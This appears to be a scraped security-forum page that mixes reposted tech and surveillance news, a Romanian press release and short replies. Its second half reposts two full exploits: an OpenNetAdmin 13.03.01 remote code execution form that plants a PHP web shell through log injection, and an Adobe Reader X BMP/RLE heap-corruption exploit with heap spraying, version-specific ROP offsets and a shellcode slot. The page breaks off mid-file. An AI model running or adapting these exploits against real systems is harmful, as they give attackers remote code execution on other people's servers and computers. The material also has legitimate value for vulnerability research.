Matt

Microsoft has rolled out a new security policy which will require third-party developers to patch vulnerabilities in order to keep their software available on the company's online markets. The company said that its new policy would apply to developers offering products for the Windows Store, Azure Marketplace, Office Store and Windows Phone Store services. Under the plan, developers will have 180 days from being notified by Microsoft of a critical or important security issue. While the severity of a security flaw varies from case to case, Microsoft generally reserves the 'critical' label for remote code execution vulnerabilities which can be exploited with little or no user notification. Flaws rated 'important' often include remote code execution, denial of service and elevation of privilege vulnerabilities. The company noted that in cases where a flaw is being actively targeted in the wild it may remove the software immediately and work with the developer to patch the vulnerability. The policy comes alongside the July edition of the company's monthly security update. The Patch Tuesday release includes six fixes for critical vulnerabilities in Microsoft's own platforms including Internet Explorer, Windows, .NET and Silverlight. Microsoft said that two of the updates should be considered a higher priority for administrators to test and deploy. The update for the Kernel Mode Driver will address a flaw in Windows, while the Internet Explorer patch addresses a number of security issues in Microsoft's web browser. “This continues the trend we’ve seen in recent Patch Tuesdays with Internet Explorer receiving fixes for lots of memory corruption vulnerabilities,” explained Marc Maiffret, chief technology officer at security firm BeyondTrust. “These vulnerabilities will be used in drive-by attacks where attackers set up malicious web pages and use social engineering tactics to draw users to the malicious pages. It is imperative that this patch gets rolled out as soon as possible.” Other updates in the July release include critical fixes for Office, Visual Studio, Lync and a number of Windows components. A seventh bulletin, rated as 'important' by Microsoft, addresses an elevation of privilege error in the Microsoft Security Software package.\ Sursa V3.co.uk

Pentru a satisface cererea tot mai mare din partea resellerilor romani, distribuitorul IT danez EET EUROPARTS isi extinde acum activitatea si in Romania. De mai mult de 26 ani ETT Europarts furnizeaza resellerilor IT europeni piese de schimb si accesorii. In prezent EET Europarts este cel mai mare distribuitor european de supraveghere video , piese de schimb si accesorii pentru computere , imprimante , telefoane mobile , catalogul de produse incluzand, de asemenea, solutii de securitate, home entertainment si lifestyle electronics. EET Europarts este distribuitor al multor marci leader pe aceste segmente de produse. Oferta EET Europarts cuprinde peste 300 branduri si mai mult de 400.000 produse. EET Group, compania mama a tuturor subsidiarelor EET Europarts, are sediul corporativ in Copenhaga, Danemarca si opereaza pe 21 de piete in Europa si Africa. In iulie 2013 EET Europarts si-a extins activitatea intrand si pe piata din Romania. ”Ca parte a planului nostru strategic de expansiune am constituit subsidiara comerciala EET Europarts International” declara John Thomas, CEO al grupului cu sediul in Copenhaga. ”Primul pas al diviziei internationale a fost intrarea EET Europarts in Estonia, Letonia si Lituania, faza care tocmai s-a incheiat. In aceasta vara ne vom extinde operatiunile in Romania si Ungaria. Am ales aceste piete pe baza cererii in crestere din partea resellerilor din aceste tari.” EET Europarts ofera resellerilor oportunitati de afaceri extrem de interesante. In afara de gama foarte variata de produse ale brandurilor leader pe care le reprezentam, compania ofera resellerilor simplitate in procesele de lucru, calitate superioara a produselor si livrarilor, precum si cel mai mare stoc disponibil in Europa. Centrul logistic al EET Group se afla langa Copenhaga si opereaza zi de zi livrari catre toata Europa. Calitatea inalta a livrarilor este asigurata de angajatii nostri specializati in logistica, precum si de sistemele video de supraveghere si control al calitatii. EET Europarts pune la dispozitia clientilor sai mai multe instrumente de comert electronic. Resellerii pot face comenzi prin webshop 24/7, avand de asemenea posibilitatea sa vizualizeze in timp real preturile si disponibilitatea stocurilor. Handlingul electronic se ofera si prin XML, clientul putand obtine actualizari de pret, cotizatii, confirmari ale comenzilor, facturi si informatii despre livrari. EET Group a dezvoltat un Product Guide bazat pe web, acesta obtinand premiul Distree EMEA la Monaco in 2012 ca ”Distributor initiative of the Year”. Acest ghid este disponibil in 16 limbi si ofera un catalog complet pentru mai mult de 50.000 computere si imprimante cu instructiuni pentru mai mult de 1 milion de produse relationate. "Oferim resellerilor un concept superior de distributie, pe langa faptul ca am inteles importanta adaptarii la pietele locale", spune John Thomas si subliniaza acest lucru ca fiind, de asemenea, un factor cheie al succesului EET Europarts. "Angajatii nostri sunt nativi si punem accent pe adaptarea filialelor noastre de vanzari la realitatile pietelor locale." Responsabil cu dezvoltarea afacerilor in Romania va fi Alvaro Artero, Vice President of Sales and Business Development. “Obiectivul nostru este ca EET Europarts sa devina si in Romania partenerul preferat al resellerilor IT.” declara Alvaro Artero. "Vom oferi distribuitorilor romani cel mai variat portofoliu de produse, cele mai bune servicii si o abordare personalizata in limba romana." Despre EET EUROPARTS EET Europarts este un distribuitor care opereaza in sectorul IT, al solutiilor de supraveghere si securitate, home entertainment si lifestyle electronics. Compania este cel mai mare distribuitor din Europa pe segmentele de supraveghere video, piese de schimb si accesorii pentru computere, imprimante si telefoane mobile. EET Europarts este reprezentant al multor marci leader pe aceste segmente de produse. In portofoliul nostru includem peste 400.000 produse si peste de 300 de branduri, printre care: HP, Lexmark, IBM, Canon, Epson, Acer, Axis, Synology, IQeye, Samsung, Ernitec, Sony, Milestone, Sling Media, B&O PLAY, MicroBattery, MicroMemory, MicroLamp, MicroStorage, MicroConnect, MicroScreen, Hitachi, Western Digital, eSTUFF, Sandberg, Garmin, Jawbone, Kensington, Libratone, Loewe si multe altele. EET Europarts face parte din EET Group, fundat in 1986 si in prezent unul dintre distribuitorii europeni leader pe segmentele IT, securitate & supraveghere, home entertainment si lifestyle electronics. EET Group are 27 birouri comerciale in 21 tari din Europa si Africa, un total de peste 400 de angajati, deserveste mai mult de 40.000 reselleri si face mai mult de 750.000 livrari pe an. Pentru mai multe informatii va rugam vizitati EET EUROPARTS Sursa: Comunicate de presa

https://rstforums.com/forum/70547-fsu-offensive-security-2013-curs-complet.rst

It's fair to say that should you see one of these warnings on your television as you're drinking your wake-up coffee, you're probably not going to have the best of days. Though, when you're told that the "bodies of the dead are rising from their graves and attacking the living," one might meet such reports — despite the official standing of such interruptions — with some skepticism. That's exactly what happened in Montana in February, when hackers broke in to the U.S. Emergency Alert System (EAS), which interrupts television and radio broadcasts in times of local and national warnings. The default password wasn't changed, allowing the hackers to walk in to the Internet-connected appliance. But a new security advisory warning warns that the EAS system is wide open to remote attacks by hackers, who can broadcast fake reports and materials. The "critical" rating from IOActive [PDF] warns that DASDEC-I and DASDEC-II application servers, made by Digital Alert Systems, are left wide open to attackers, following a recent firmware update that also disseminated the secure-shell (SSH) key. The key allows anyone with limited knowledge to log in at the root level of the server and "manipulate any system function," including browse key directories and access its peering arrangement. From the advisory, an attacker who gains control of one or more DASDEC systems "can disrupt these stations' ability to transmit and could disseminate false emergency information over a large geographic area," which in some cases could be "forwarded to and mirrored" by other systems, spreading false information over a wider area. The key is now in the public domain, and "cannot be easily removed except by a root privileged user on the server." The security advisory warns the maker of these appliances to "re-evaluate their firmware and push updates to all appliances." Other advisories were published, including one by the U.S. CERT team, which notes that firmware version 2.0-2 resolves this vulnerability. Sursa Zdnet.Com

Si acum ban la toata lumea.

The legal challenge is one of several launched since Snowden's leaks were reported by the Guardian and Washington Post last month. The US supreme court will be asked to suspend the blanket collection of US telephone records by the FBI under an emergency petition due to be filed on Monday by civil rights campaigners at the Electronic Privacy Information Center (Epic). This new legal challenge to the power of government agencies to spy on Americans follows the publication last month by the Guardian of a secret order from the Foreign Intelligence Surveillance Court ordering Verizon to hand over metadata from its phone records. Previous attempts to appeal against the rulings of these courts have floundered due to a lack of public information about who might be caught up in the surveillance net, but the disclosure of specific orders by National Security Agency whistleblower Edward Snowden has opened the door to a flurry of new challenges. It comes as a similar legal challenge was filed in Britain on Monday. The latest from Epic asks the supreme court to rule that the NSA and FBI have stretched the law governing state intrusion to such a point that checks and balances put in by lawmakers have become meaningless. Under section 1861 of Foreign Intelligence Surveillance Act (Fisa), authorities seeking such records from phone companies must show "that there are reasonable grounds to to believe that the tangible things sought are relevant to an authorized investigation". But lawyers acting for Epic argue that the sweeping nature of Fisa court orders revealed by Snowden make a mockery of this "relevancy" clause. "It is simply not possible that every phone record in the possession of a telecommunications firm could be relevant to an authorized investigation," says a copy of the petition seen by the Guardian. "Such an interpretation of Section 1861 would render meaningless the qualifying phrases contained in the provision and eviscerate the purpose of the Act." The petition seeks a "writ of mandamus" to immediately overturn the order of the lower court, presided on in secret by judge Roger Vinson, or alternatively a "writ of certiorari" to allow supreme court justices to review the decision. Epic lawyers also argue the original order is unconstitutional because it gives too much power to federal agencies, which could be abused to interfere in other areas of government. "Because the NSA sweeps up judicial and congressional communications, it inappropriately arrogates exceptional power to the executive branch," says the petition. A number of other legal challenges have been launched since Snowden's leaks began to be reported by the Guardian and Washington Post last month. The American Civil Liberties Union filed a lawsuit with a Federal court in New York which accused the US government of a process that was "akin to snatching every American's address book". It claimed the NSA's acquisition of phone records of millions of Verizon users violates the first and fourth amendments, which guarantee citizens' right to association, speech and to be free of unreasonable searches and seizures. And on Capitol Hill, a group of US senators have introduced a bill aimed at forcing the US federal government to disclose the opinions of the FISA court that determines the scope of the eavesdropping on Americans' phone records and internet communications. SursaGuardian.co.uk

Subscriu.

Pe langa astea mai este si : Default Router Passwords - PortForward.com

Cum s-a procedat cu Filelist?

xx

Toata intrebarea e de fapt " o fraza " care e de fapt o propozitie

admis !

Description : OpenNetAdmin version 13.03.01 suffers from a remote code execution vulnerability. Author : Mandat0ry Source : OpenNetAdmin 13.03.01 Remote Code Execution ? Packet Storm Code : # Exploit Title: OpenNetAdmin Remote Code Execution # Date: 03/04/13 # Exploit Author: Mandat0ry (aka Matthew Bryant) # Vendor Homepage: http://opennetadmin.com/ # Software Link: http://opennetadmin.com/download.html # Version: 13.03.01 # Tested on: Ubuntu # CVE : No CVE exists - 0day exploit - probably works on the demo on their site as well! So they should be alerted. OpeNetAdmin Remote Code Execution Exploit by Mandat0ry (aka Matthew Bryant) Info: This exploit works because adding modules can be done without any sort of authentication. Modules are in this form: module[name] = The name of the function that will be run out of the included file module[description] = Irrelevant description of the module (unless some PHP code is injected here hmm?) module[file] = The file to be included and then the function module[name] will be run from this included file This exploit works by injecting some PHP code into the /var/log/ona.log file via the module description parameter. Everytime a module is added to OpenNetAdmin the description/name/etc are all logged into this log file. So... By simply setting the module filepath to "../../../../../../../../../../../var/log/ona.log" (add or remove dots at will) we can include the log file as a module. Where it gets clever is remember the description is logged! So we can add PHP code into the description and thus the logs and it will be executed on inclusion of this file! The PHP interpreter will ignore everything not enclosed in PHP tags so it will only run the code we inject. This is basically a spin off of Apache log injection exploitation. Once the module has been added all you have to do is run it via "dcm.php?module=". This all works without any guest account etc. NOTE: Because of the way the logger script works we cannot use any "=" in our injected code as it will be escaped before being added to the logs ("\=") so avoid using it! Cool software but the code has a lot to be desired, I imagine their are a LOT more exploits than what I found but once I had RCE I was satisfied. Proof of concept code for easy exploitation. Run this and then go to http://URLHERE/ona/dcm.php?module=mandat0ry for your shell! <center> <head> <title>0wned Your Network</title> <script type="text/javascript"> function changeaction() { document.sploit.action = document.getElementById("url").value; alert('Remember, your shell must be accessed via '+document.getElementById("url").value+'?module=mandat0ry'); } </script> </head> <font size="5">OpenNetAdmin RCE Exploit</font><br /> <font size="2"><i>Now with leet button sploiting action! (oooh, ahhh!)</i></font><br /><br /> <form action="/" method="post" name="sploit" onsubmit="changeaction()" > URL: <input id="url" value="http://127.0.0.1/ona/dcm.php" size="50" /><br /> PHP Code to Execute: <input type="text" size="50" name="options[desc]" value="<?php echo shell_exec($_GET[1]) ?>"/> <br /> <input type="hidden" name="module" value="add_module" /> <input type="hidden" name="options[name]" value="mandat0ry" /> <input type="hidden" name="options[file]" value="../../../../../../../../../../../var/log/ona.log" /> <input type="submit" value="Exploit!" /> </form> <b><i>Special thanks to: offsec, twitches, funkenstein, zachzor, av1dmage, drc, arsinh, and the coders for OpenNetAdmin!</i></b> </center>

Description : Adobe Reader X version 10.1.4.38 suffers from a BMP/RLE heap corruption vulnerability. Author : feliam Source : Adobe Reader X 10.1.4.38 BMP/RLE Heap Corruption ? Packet Storm Code : ''' Title: Adobe Reader X BMP/RLE heap corruption Product: Adobe Reader X Version: 10.x Product Homepage: adobe.com Binary affected: AcroForm.api Binary Version: 10.1.4.38 Binary MD5: 8e0fc0c6f206b84e265cc3076c4b9841 Configuration Requirements ----------------------------------------- Default configuration. Vulnerability Requirements ----------------------------------------- None. Vulnerability Description ----------------------------------------- Adobe Reader X fails to validate the input when parsing an embedded BMP RLE encoded image. Arbitrary code execution in the context of the sandboxed process is proved possible after a malicious embeded bmp image triggers a heap overflow. Vulnerability WorkAround (if possible) ----------------------------------------- Delete AcroForm.api ''' from hashlib import md5 import sys, struct ######### Begin of the miniPDF import zlib #For constructing a minimal pdf file ## PDF REference 3rd edition:: 3.2 Objects class PDFObject: def __init__(self): self.n=None self.v=None def __str__(self): raise Exception("Fail") ## PDF REference 3rd edition:: 3.2.1 Booleans Objects class PDFBool(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): if self.s: return "true" return "false" ## PDF REference 3rd edition:: 3.2.2 Numeric Objects class PDFNum(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "%s"%self.s ## PDF REference 3rd edition:: 3.2.3 String Objects class PDFString(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "(%s)"%self.s ## PDF REference 3rd edition:: 3.2.3 String Objects / Hexadecimal Strings class PDFHexString(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "<" + "".join(["%02x"%ord(c) for c in self.s]) + ">" ## A convenient type of literal Strings class PDFOctalString(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s="".join(["\\%03o"%ord(c) for c in s]) def __str__(self): return "(%s)"%self.s ## PDF REference 3rd edition:: 3.2.4 Name Objects class PDFName(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "/%s"%self.s ## PDF REference 3rd edition:: 3.2.5 Array Objects class PDFArray(PDFObject): def __init__(self,s): PDFObject.__init__(self) assert type(s) == type([]) self.s=s def append(self,o): self.s.append(o) return self def __str__(self): return "[%s]"%(" ".join([ o.__str__() for o in self.s])) ## PDF REference 3rd edition:: 3.2.6 Dictionary Objects class PDFDict(PDFObject): def __init__(self, d={}): PDFObject.__init__(self) self.dict = {} for k in d: self.dict[k]=d[k] def __iter__(self): for k in self.dict.keys(): yield k def __iterkeys__(self): for k in self.dict.keys(): yield k def __getitem__(self, key): return self.dict[key] def add(self,name,obj): self.dict[name] = obj def get(self,name): if name in self.dict.keys(): return self.dict[name] else: return None def __str__(self): s="<<" for name in self.dict: s+="%s %s "%(PDFName(name),self.dict[name]) s+=">>" return s ## PDF REference 3rd edition:: 3.2.7 Stream Objects class PDFStream(PDFDict): def __init__(self,d={},stream=""): PDFDict.__init__(self,d) self.stream=stream self.filtered=self.stream self.add('Length', len(stream)) self.filters = [] def appendFilter(self, filter): self.filters.append(filter) self._applyFilters() #yeah every time .. so what! def _applyFilters(self): self.filtered = self.stream for f in self.filters: self.filtered = f.encode(self.filtered) if len(self.filters)>0: self.add('Length', len(self.filtered)) self.add('Filter', PDFArray([f.name for f in self.filters])) #Add Filter parameters ? def __str__(self): self._applyFilters() #yeah every time .. so what! s="" s+=PDFDict.__str__(self) s+="\nstream\n" s+=self.filtered s+="\nendstream" return s ## PDF REference 3rd edition:: 3.2.8 Null Object class PDFNull(PDFObject): def __init__(self): PDFObject.__init__(self) def __str__(self): return "null" ## PDF REference 3rd edition:: 3.2.9 Indirect Objects class UnResolved(PDFObject): def __init__(self,n,v): PDFObject.__init__(self) self.n=n self.v=v def __str__(self): return "UNRESOLVED(%d %d)"%(self.n,self.v) class PDFRef(PDFObject): def __init__(self,obj): PDFObject.__init__(self) self.obj=[obj] def __str__(self): if len(self.obj)==0: return "null" return "%d %d R"%(self.obj[0].n,self.obj[0].v) ## PDF REference 3rd edition:: 3.3 Filters ## Example Filter... class FlateDecode: name = PDFName('FlateDecode') def __init__(self): pass def encode(self,stream): return zlib.compress(stream) def decode(self,stream): return zlib.decompress(stream) ## PDF REference 3rd edition:: 3.4 File Structure ## Simplest file structure... class PDFDoc(): def __init__(self,obfuscate=0): self.objs=[] self.info=None self.root=None def setRoot(self,root): self.root=root def setInfo(self,info): self.info=info def _add(self,obj): if obj.v!=None or obj.n!=None: raise Exception("Already added!!!") obj.v=0 obj.n=1+len(self.objs) self.objs.append(obj) def add(self,obj): if type(obj) != type([]): self._add(obj); else: for o in obj: self._add(o) def _header(self): return "%PDF-1.5\n%\xE7\xF3\xCF\xD3\n" def __str__(self): doc1 = self._header() xref = {} for obj in self.objs: xref[obj.n] = len(doc1) doc1+="%d %d obj\n"%(obj.n,obj.v) doc1+=obj.__str__() doc1+="\nendobj\n" posxref=len(doc1) doc1+="xref\n" doc1+="0 %d\n"%(len(self.objs)+1) doc1+="0000000000 65535 f \n" for xr in xref.keys(): doc1+= "%010d %05d n \n"%(xref[xr],0) doc1+="trailer\n" trailer = PDFDict() trailer.add("Size",len(self.objs)+1) if self.root == None: raise Exception("Root not set!") trailer.add("Root",PDFRef(self.root)) if self.info: trailer.add("Info",PDFRef(self.info)) doc1+=trailer.__str__() doc1+="\nstartxref\n%d\n"%posxref doc1+="%%EOF" return doc1 ######### End of miniPDF SLIDESIZE=0x12C def mkBMP(payload, exception=True): bmp = '' #getInfoHeader bfType = 0x4d42 assert bfType in [0x4d42,0x4349,0x5043,0x4943,0x5043] #0x4142: not supp bmp += struct.pack('<H', bfType) bfSize = 0 bfOffBits = 0 bmp += struct.pack('<L', bfSize) bmp += struct.pack('<H', 0) #Reserved1 bmp += struct.pack('<H', 0) #Reserved2 bmp += struct.pack('<L', bfOffBits) biSize = 0x40 assert not biSize in [0x12] bmp += struct.pack('<L', biSize) biHeight = 1 biWidth = SLIDESIZE #size of texture structure LFH enabled biPlanes = 1 biBitCount = 8 biCompression = 1 biSizeImage = 0 biXPelsPerMeter = 0 biYPelsPerMeter = 0 biClrUsed = 2 if biClrUsed >0xff: raise "BUG!!!!" biClrImportant = 0 bmp += struct.pack('<L', biWidth) bmp += struct.pack('<L', biHeight) bmp += struct.pack('<H', biPlanes) bmp += struct.pack('<H', biBitCount) bmp += struct.pack('<L', biCompression) bmp += struct.pack('<L', biSizeImage) bmp += struct.pack('<L', biXPelsPerMeter) bmp += struct.pack('<L', biYPelsPerMeter) bmp += struct.pack('<L', biClrUsed) bmp += struct.pack('<L', biClrImportant) bmp += 'A'*(biSize-0x40) #pad numColors=biClrUsed if biClrUsed == 0 or biBitCount < 8: numColors = 1<<biBitCount; bmp += 'RGBA'*(numColors) #pallete bmp += '\x00\x02\xff\x00' * ((0xffffffff-0xff) / 0xff) #while (len(bmp)+10)%0x400 != 0: # bmp += '\x00\x02\x00\x00' assert len(payload) < 0x100 and len(payload) >= 3 bmp += '\x00\x02'+chr(0x100-len(payload))+'\x00' bmp += '\x00'+chr(len(payload))+payload if len(payload)&1 : bmp += 'P' if exception: bmp += '\x00\x02\x00\xff'*10 #getting the pointer outside the texture so it triggers an exception bmp += '\x00'+chr(10)+'X'*10 else: bmp += '\x00\x01' #'\x04X'*(biWidth+2000)+"\x00\x02" return bmp def UEncode(s): r = '' s += '\x00'*(len(s)%2) for i in range(0,len(s),2): r+= '\\u%04x'%(struct.unpack('<H', (s[i:i+2]))[0]) return r r = '' for c in s: r+= '%%%02x'%ord(c) return r def mkXFAPDF(shellcode = '\x90'*0x400+'\xcc'): xdp = ''' <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" timeStamp="2012-11-23T13:41:54Z" uuid="0aa46f9b-2c50-42d4-ab0b-1a1015321da7"> <template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/" xmlns="http://www.xfa.org/schema/xfa-template/3.0/"> <?formServer defaultPDFRenderFormat acrobat9.1static?> <?formServer allowRenderCaching 0?> <?formServer formModel both?> <subform name="form1" layout="tb" locale="en_US" restoreState="auto"> <pageSet> <pageArea name="Page1" id="Page1"> <contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/> <medium stock="default" short="612pt" long="792pt"/> <?templateDesigner expand 1?> </pageArea> <?templateDesigner expand 1?> </pageSet> <variables> <script name="util" contentType="application/x-javascript"> // Convenience functions to pack and unpack litle endian an utf-16 strings function pack(i){ var low = (i & 0xffff); var high = ((i>>16) & 0xffff); return String.fromCharCode(low)+String.fromCharCode(high); } function unpackAt(s, pos){ return s.charCodeAt(pos) + (s.charCodeAt(pos+1)<<16); } function packs(s){ result = ""; for (i=0;i<s.length;i+=2) result += String.fromCharCode(s.charCodeAt(i) + (s.charCodeAt(i+1)<<8)); return result; } function packh(s){ return String.fromCharCode(parseInt(s.slice(2,4)+s.slice(0,2),16)); } function packhs(s){ result = ""; for (i=0;i<s.length;i+=4) result += packh(s.slice(i,i+4)); return result; } var verbose = 1; function message(x){ if (util.verbose == 1 ) xfa.host.messageBox(x); } //ROP0 //7201E63D XCHG EAX,ESP //7201E63E RETN //ROP1 //7200100A JMP DWORD PTR DS:[KERNEL32.GetModuleHandle] //ROP2 //7238EF5C PUSH EAX //7238EF5D CALL DWORD PTR DS:[KERNEL32.GetProcAddress] //7238EF63 TEST EAX,EAX //7238EF65 JNE SHORT 7238EF84 //7238EF84 POP EBP //7238EF85 RETN 4 //ROP3 //72001186 JMP EAX ; kernel32.VirtualProtect //ROP4 //72242491 ADD ESP,70 //72242494 RETN var _offsets = {'Reader": { "10.104": { "acrord32": 0xA4, "rop0": 0x1E63D, "rop1": 0x100A, "rop2": 0x38EF5C, "rop3": 0x1186, "rop4": 0x242491, }, "10.105": { // Added by Eddie Mitchell "acrord32": 0xA5, "rop0": 0x1E52D, "rop1": 0x100A, "rop2": 0x393526, "rop3": 0x1186, "rop4": 0x245E71, }, "10.106": { // Added by Eddie Mitchell "acrord32": 0xA5, "rop0": 0x1E52D, "rop1": 0x100A, "rop2": 0x393526, "rop3": 0x1186, "rop4": 0x245E71, }, }, "Exchange-Pro": { "10.105": { // Added by Eddie Mitchell "acrobat": 0xCD, "rop0": 0x3720D, "rop1": 0x100A, "rop2": 0x3DCC91, "rop3": 0x180F, "rop4": 0x25F2A1, }, }, }; function offset(x){ //app.viewerType will be "Reader" for Reader, //"Exchange" for Acrobat Standard or "Exchange-Pro" for Acrobat Pro try { return _offsets[app.viewerType][app.viewerVersion][x]; } catch (e) { xfa.host.messageBox("Type:" +app.viewerType+ " Version: "+app.viewerVersion+" NOT SUPPORTED!"); } return 0x41414141; } </script> <script name="spray" contentType="application/x-javascript"> // Global variable for spraying var slide_size=%%SLIDESIZE%%; var size = 200; var chunkx = "%%MINICHUNKX%%"; var x = new Array(size); var y = new Array(size); var z = new Array(size); var pointers = new Array(100); var done = 0; </script> <?templateDesigner expand 1?> </variables> <subform w="576pt" h="756pt"> <!-- This image fiel hold the cashing image --> <field name="ImageCrash"> <ui> <imageEdit/> </ui> <value> <image aspect="actual" contentType="image/jpeg">%%BMPFREELFH%%</image> </value> </field> </subform> <event activity="initialize" name="event__initialize"> <script contentType="application/x-javascript"> // This script runs at the very beginning and // is used to prepare the memory layout util.message("Initialize"); var i; var j; if (spray.done == 0){ //Trigger LFH use var TOKEN = "\u5858\u5858\u5678\u1234"; var chunk_len = spray.slide_size/2-1-(TOKEN.length+2+2); for (i=0; i < spray.size; i+=1) spray.x[i] = TOKEN + util.pack(i) + spray.chunkx.substring(0, chunk_len) + util.pack(i) + ""; util.message("Initial spray done!"); for (j=0; j < size; j++) for (i=spray.size-1; i > spray.size/4; i-=10) spray.x[i]=null; spray.done = 1; util.message("Generating holes done!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"); } // After this the form layout is rendered and the bug triggered </script> </event> <event activity="docReady" ref="$host" name="event__docReady"> <script contentType="application/x-javascript"> // This script runs once the page is ready util.message("DocReady"); var i; var j; var found = -1; // Index of the overlapped string var acro = 0; // Base of the AcroRd32_dll // Search over all strings for the first one with the broken TOKEN for (i=0; i < spray.size; i+=1) if ((spray.x[i]!=null) && (spray.x[i][0] != "\u5858")){ found = i; acro = (( util.unpackAt(spray.x[i], 14) >> 16) - util.offset("acrord32")) << 16; util.message("Found! String number "+ found + " has been corrupted acrord32.dll:" + acro.toString(16) ); break; } // Behaviour is mostly undefined if not found if (found == -1){ util.message("Corrupted String NOT Found!"); event.target.closeDoc(true); } // Corrupted string was found let's generates the new // string for overlapping the struct before freeing it var chunky = ""; for (i=0; i < 7; i+=1) chunky += util.pack(0x41414141); chunky += util.pack(0x10101000); while (chunky.length < spray.slide_size/2) chunky += util.pack(0x58585858); // Free the overlapping string util.message("Feeing corrupted string! Previous string will we used-free ("+(found)+")"); for (j=0; j < 100000; j++) spray.x[found-1]=spray.x[found]=null; // Trigger several allocs that will fall over the structure for (i=0; i < 200; i+=1){ ID = "" + i; spray.y[i] = chunky.substring(0,spray.slide_size/2-ID.length) + ID+ ""; } util.message("Allocated 20 chunks-y\\n"); // Heap spraying make's baby jesus cry! // Construct the 0x1000 small chunk for spraying var obj = 0x10101000; var pointer_slide = ""; pointer_slide += util.pack(acro+util.offset("rop4")); //add esp,70;ret for (i=0; i < 27; i+=1) pointer_slide += util.pack(0x41414141); obj += pointer_slide.length*2; // ROP pointer_slide += util.pack(acro+util.offset("rop0")); //XCHG EAX,ESP;ret pointer_slide += util.pack(acro+util.offset("rop1")); //0x100A jmp getmodule pointer_slide += util.pack(acro+util.offset("rop2")); //@0x04 - getProcAddress pointer_slide += util.pack(obj+0xDC); //@0x08 point to KERNEL32 //@0x10 pointer_slide += util.pack(obj+0xCC); pointer_slide += util.pack(0x43434343); // POPPED TO EBP pointer_slide += util.pack(acro+util.offset("rop3")); // JMP EAX pointer_slide += util.pack(obj); //Points to offset 0 of this //@0x20 pointer_slide += util.pack(obj+0x38); pointer_slide += util.pack(obj+0x38); pointer_slide += util.pack(0x1000); //SIZE_T dwSize, pointer_slide += util.pack(0x40); // DWORD flNewProtect, //0x30 pointer_slide += util.pack(obj+0x34); //PDWORD lpflOldProtect pointer_slide += util.pack(0x00000000); //DWORD OldProtect pointer_slide += util.packhs("E9B1000000909090"); //0x40 pointer_slide += util.pack(acro); //Used by next stage pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); //0x50 pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); //0x60 pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); //0x70 pointer_slide += util.pack(acro); pointer_slide += util.pack(0x48484848); pointer_slide += util.pack(0x49494949); pointer_slide += util.pack(0x49494949); //0x80 pointer_slide += util.pack(0x49494949); pointer_slide += util.pack(0x50505050); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); //0x90 pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); //0xa0 pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); //0xb0 pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); //0xc0 pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.packs("VirtualProtect"); //@0xCC pointer_slide += "\u0000"; pointer_slide += "KERNEL32"; pointer_slide += "\u0000"; pointer_slide += "%%SHELLCODE%%"; while (pointer_slide.length < 0x1000/2) pointer_slide += util.pack(0x41414141); pointer_slide = pointer_slide.substring(0,0x1000/2); util.message("Pointer slide size: " + pointer_slide.length); // And now ensure it gets bigger than 0x100000 bytes while (pointer_slide.length < 0x100000/2) pointer_slide += pointer_slide; // And the actual spray for (i=0; i < 100; i+=1) spray.pointers[i] = pointer_slide.substring(16, 0x100000/2-16-2)+ util.pack(i) + ""; // Everything done here close the doc and // trigger the use of the vtable util.message("Now what?"); var pdfDoc = event.target; pdfDoc.closeDoc(true); </script> </event> </subform> <?originalXFAVersion http://www.xfa.org/schema/xfa-template/2.5/?> <?templateDesigner DefaultLanguage JavaScript?> <?templateDesigner DefaultRunAt client?> <?acrobat JavaScript strictScoping?> <?PDFPrintOptions embedViewerPrefs 0?> <?PDFPrintOptions embedPrintOnFormOpen 0?> <?PDFPrintOptions scalingPrefs 0?> <?PDFPrintOptions enforceScalingPrefs 0?> <?PDFPrintOptions paperSource 0?> <?PDFPrintOptions duplexMode 0?> <?templateDesigner DefaultPreviewType interactive?> <?templateDesigner DefaultPreviewPagination simplex?> <?templateDesigner XDPPreviewFormat 19?> <?templateDesigner DefaultCaptionFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?> <?templateDesigner DefaultValueFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?> <?templateDesigner Zoom 119?> <?templateDesigner FormTargetVersion 30?> <?templateDesigner SaveTaggedPDF 1?> <?templateDesigner SavePDFWithEmbeddedFonts 1?> <?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?></template> <config xmlns="http://www.xfa.org/schema/xci/3.0/"> <agent name="designer"> <!-- [0..n] --> <destination>pdf</destination> <pdf> <!-- [0..n] --> <fontInfo/> </pdf> </agent> <present> <!-- [0..n] --> <pdf> <!-- [0..n] --> <version>1.7</version> <adobeExtensionLevel>5</adobeExtensionLevel> </pdf> <common/> <xdp> <packets>*</packets> </xdp> </present> </config> <localeSet xmlns="http://www.xfa.org/schema/xfa-locale-set/2.7/"> <locale name="en_US" desc="English (United States)"> <calendarSymbols name="gregorian"> <monthNames> <month>January</month> <month>February</month> <month>March</month> <month>April</month> <month>May</month> <month>June</month> <month>July</month> <month>August</month> <month>September</month> <month>October</month> <month>November</month> <month>December</month> 